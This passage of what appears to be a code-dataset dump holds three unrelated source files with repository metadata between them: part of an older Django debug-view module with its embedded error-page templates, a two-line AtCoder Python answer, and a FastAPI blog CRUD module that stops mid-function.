else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
elif isinstance(value, HttpRequest):
# Cleanse the request's POST parameters.
value = self.get_request_repr(value)
cleansed[name] = value
else:
for name, value in tb_frame.f_locals.items():
if isinstance(value, HttpRequest):
# Cleanse the request's POST parameters.
value = self.get_request_repr(value)
cleansed[name] = value
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in tb_frame.f_locals):
# the sensitive_variables decorator's frame, in case the variables
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
class ExceptionReporter(object):
def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = None
self.template_does_not_exist = False
self.loader_debug_info = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def get_traceback_data(self):
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
from django.template.loader import template_source_loaders
self.template_does_not_exist = True
self.loader_debug_info = []
for loader in template_source_loaders:
try:
source_list_func = loader.get_template_sources
# NOTE: This assumes exc_value is the name of the template that
# the loader attempted to load.
template_list = [{'name': t, 'exists': os.path.exists(t)} \
for t in source_list_func(str(self.exc_value))]
except AttributeError:
template_list = []
loader_name = loader.__module__ + '.' + loader.__class__.__name__
self.loader_debug_info.append({
'loader': loader_name,
'templates': template_list,
})
if (settings.TEMPLATE_DEBUG and
hasattr(self.exc_value, 'django_template_source')):
self.get_template_exception_info()
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame['vars'] = [(k, force_escape(pprint(v))) for k, v in frame['vars']]
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = smart_text(unicode_str[max(start-5, 0):min(end+5, len(unicode_str))], 'ascii', errors='replace')
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST': self.filter.get_post_parameters(self.request),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': datetime.datetime.now(),
'django_version_info': get_version(),
'sys_path' : sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'loader_debug_info': self.loader_debug_info,
}
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = smart_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
t = Template(TECHNICAL_500_TEMPLATE, name='Technical 500 template')
c = Context(self.get_traceback_data())
return t.render(c)
def get_traceback_text(self):
t = Template(TECHNICAL_500_TEXT_TEMPLATE, name='Technical 500 template')
c = Context(self.get_traceback_data(), autoescape=False)
return t.render(c)
def get_template_exception_info(self):
origin, (start, end) = self.exc_value.django_template_source
template_source = origin.reload()
context_lines = 10
line = 0
upto = 0
source_lines = []
before = during = after = ""
for num, next in enumerate(linebreak_iter(template_source)):
if start >= upto and end <= next:
line = num
before = escape(template_source[upto:start])
during = escape(template_source[start:end])
after = escape(template_source[end:next])
source_lines.append( (num, escape(template_source[upto:next])) )
upto = next
total = len(source_lines)
top = max(1, line - context_lines)
bottom = min(total, line + 1 + context_lines)
# In some rare cases, exc_value.args might be empty.
try:
message = self.exc_value.args[0]
except IndexError:
message = '(Could not get exception message)'
self.template_info = {
'message': message,
'source_lines': source_lines[top:bottom],
'before': before,
'during': during,
'after': after,
'top': top,
'bottom': bottom,
'total': total,
'line': line,
'name': origin.name,
}
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
source = None
if loader is not None and hasattr(loader, "get_source"):
source = loader.get_source(module_name)
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.readlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = [line.strip('\n') for line in source[lower_bound:lineno]]
context_line = source[lineno].strip('\n')
post_context = [line.strip('\n') for line in source[lineno+1:upper_bound]]
return lower_bound, pre_context, context_line, post_context
def get_traceback_frames(self):
frames = []
tb = self.tb
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(filename, lineno, 7, loader, module_name)
if pre_context_lineno is not None:
frames.append({
'tb': tb,
'type': module_name.startswith('django.') and 'django' or 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
tb = tb.tb_next
return frames
def format_exception(self):
import traceback
frames = self.get_traceback_frames()
tb = [ (f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames ]
list = ['Traceback (most recent call last):\n']
list += traceback.format_list(tb)
list += traceback.format_exception_only(self.exc_type, self.exc_value)
return list
def technical_404_response(request, exception):
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried # empty URLconf
or (request.path == '/'
and len(tried) == 1 # default URLconf
and len(tried[0]) == 1
and tried[0][0].app_name == tried[0][0].namespace == 'admin')):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
t = Template(TECHNICAL_404_TEMPLATE, name='Technical 404 template')
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': request.path_info[1:], # Trim leading slash
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
t = Template(DEFAULT_URLCONF_TEMPLATE, name='Default URLconf template')
c = Context({})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 0 20px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block' : 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML == s1 ? s2 : s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception supplied{% endif %}</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if loader_debug_info %}
<p>Django tried loading these templates, in this order:</p>
<ul>
{% for loader in loader_debug_info %}
<li>Using loader <code>{{ loader.loader }}</code>:
<ul>{% for t in loader.templates %}<li><code>{{ t.name }}</code> (File {% if t.exists %}exists{% else %}does not exist{% endif %})</li>{% endfor %}</ul>
</li>
{% endfor %}
</ul>
{% else %}
<p>Django couldn't find any templates because your <code>TEMPLATE_LOADERS</code> setting is empty!</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>{{ template_info.before }}<span class="specific">{{ template_info.during }}</span>{{ template_info.after }}</td></tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">Switch to copy-and-paste view</a></span>{% endif %}</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">{% for line in frame.pre_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line"><li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">{% for line in frame.post_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title" value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template Loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} (File {% if t.exists %}exists{% else %}does not exist{% endif %})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}
Traceback:
{% for frame in frames %}File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}
{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard 500 page.
</p>
</div>
{% endif %}
</body>
</html>
"""
TECHNICAL_500_TEXT_TEMPLATE = """{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} (File {% if t.exists %}exists{% else %}does not exist{% endif %})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:
{% for frame in frames %}File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard 500 page.
"""
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>Welcome to Django</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>It worked!</h1>
<h2>Congratulations on your first Django-powered page.</h2>
</div>
<div id="instructions">
<p>
Of course, you haven't actually done any work yet.
Next, start your first app by running <code>python manage.py startapp [appname]</code>.
</p>
</div>
<div id="explanation">
<p>
You're seeing this message because you have <code>DEBUG = True</code> in your
Django settings file and you haven't configured any URLs. Get to work!
</p>
</div>
</body></html>
"""
| true | true |
1c331d725ab785933f4f8fd885d27ab580d5d5b5 | 34 | py | Python | code/answer_4-2-4.py | KoyanagiHitoshi/AtCoder-Python-Introduction | 6d014e333a873f545b4d32d438e57cf428b10b96 | [
"MIT"
] | 1 | 2022-03-29T13:50:12.000Z | 2022-03-29T13:50:12.000Z | code/answer_4-2-4.py | KoyanagiHitoshi/AtCoder-Python-Introduction | 6d014e333a873f545b4d32d438e57cf428b10b96 | [
"MIT"
] | null | null | null | code/answer_4-2-4.py | KoyanagiHitoshi/AtCoder-Python-Introduction | 6d014e333a873f545b4d32d438e57cf428b10b96 | [
"MIT"
] | null | null | null | S, T = input().split()
print(T+S)
| 11.333333 | 22 | 0.558824 | S, T = input().split()
print(T+S)
| true | true |
1c331d987ad5b34a2b09716f44ad466887f0b6b2 | 2,424 | py | Python | api/blog.py | yezz123/DogeAPI | 91e719ad8f252578728ee2a427fd6b733f0cf2a8 | [
"MIT"
] | 93 | 2021-05-13T00:13:19.000Z | 2022-03-30T03:55:09.000Z | api/blog.py | yezz123/DogeAPI | 91e719ad8f252578728ee2a427fd6b733f0cf2a8 | [
"MIT"
] | 17 | 2021-05-16T14:49:24.000Z | 2021-10-18T23:29:48.000Z | api/blog.py | yezz123/DogeAPI | 91e719ad8f252578728ee2a427fd6b733f0cf2a8 | [
"MIT"
] | 22 | 2021-05-13T08:32:59.000Z | 2022-02-23T13:07:05.000Z | #!/usr/bin/python3
from fastapi import HTTPException, status
from sqlalchemy.orm import Session
from models import models
from schema import schemas
def get_all(db: Session):
"""
Get all blogs
Args:
db (Session): Database session
Returns:
List[models.Blog]: List of blogs
"""
return db.query(models.Blog).all()
def create(request: schemas.Blog, db: Session):
"""
Create a new blog
Args:
request (schemas.Blog): Blog object
db (Session): Database session
Returns:
models.Blog: Blog object
"""
new_blog = models.Blog(title=request.title, body=request.body, user_id=1)
db.add(new_blog)
db.commit()
db.refresh(new_blog)
return new_blog
def destroy(id: int, db: Session):
"""
Delete a blog
Args:
id (int): Blog id
db (Session): Database session
Raises:
HTTPException: 404 not found
Returns:
str: Success message
"""
blog_to_delete = db.query(models.Blog).filter(models.Blog.id == id)
if not blog_to_delete.first():
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"Blog with id {id} not found.",
)
blog_to_delete.delete(synchronize_session=False)
db.commit()
return {"done"}
def update(id: int, request: schemas.Blog, db: Session):
"""
Update a blog
Args:
id (int): Blog id
request (schemas.Blog): Blog object
db (Session): Database session
Raises:
HTTPException: 404 not found
Returns:
models.Blog: Blog object
"""
blog = db.query(models.Blog).filter(models.Blog.id == id)
if not blog.first():
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND, detail=f"Blog with id {id} not found"
)
blog.update(request.__dict__)
db.commit()
return "updated"
def show(id: int, db: Session):
"""
Get a blog
Args:
id (int): Blog id
db (Session): Database session
Raises:
HTTPException: 404 not found
Returns:
models.Blog: Blog object
"""
